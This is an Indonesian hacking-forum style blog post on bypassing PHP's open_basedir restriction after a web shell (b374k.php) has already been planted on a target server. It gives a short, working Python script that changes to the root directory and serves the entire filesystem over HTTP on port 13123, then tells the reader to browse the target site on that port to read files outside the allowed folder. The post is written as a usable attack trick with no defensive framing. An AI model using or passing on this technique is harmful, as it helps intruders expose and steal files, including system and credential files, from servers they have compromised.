kali ini ane mau membagi sedikit trik cupu untuk membypass server yg di set open_basedir nya, mungkin dah bnyk yg tau, hehehe, mungkin juga blum pada tau :-p
open_basedir itu sendiri adalah settingan pada php.ini yg bisa membatasi akses php pada folder tertentu, misalkan ane set seperti ini pada php.ini
Code:open_basedir = /var/www/dono
maka kita tidak akan bisa membuka semua dir selain /var/www/dono dan semua file dan folder didalamnya...
jadi kita gak bisa buka misalnya tetangganya /var/www/kasino atau /var/www/indro ataupun /etc dll
baca lebih jelas tentang open_basedir disini
http://id.php.net/manual/en/ini.core.php...en-basedir
misal kita udah ada shell di /var/www/dono/b374k.php
nah truz kita buka tuh shell,
ternyata kita gak bisa ke folder2 lain karena di batasi menggunakan open_basedir nya php
nah klo ketemu yg kek gini ada berbagai macam solusinya
kali ini mari kita bypass menggunakan python,
jadi python harus bisa diakses dari shell punya kita, coba cek pake
klo keluar help nya itu berarti bisa kita lanjut coba,Code:python -h
klo python gak bisa diakses langkah selanjutnya gak akan bisa, nanti ane buatkan thread lainnya untuk bypass yg kyk gini klo python gak bisa
save script python berikut ini dengan nama misalnya webs.py
http://pastebin.com/vPFCVu7hCode:#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()
jalankan script python kita dengan perintah
Code:python webs.py
sekarang buka websitenya di port 13123
misalkan target nya http://jablay.com/
maka buka di http://jablay.com:13123
0 komentar:
Post a Comment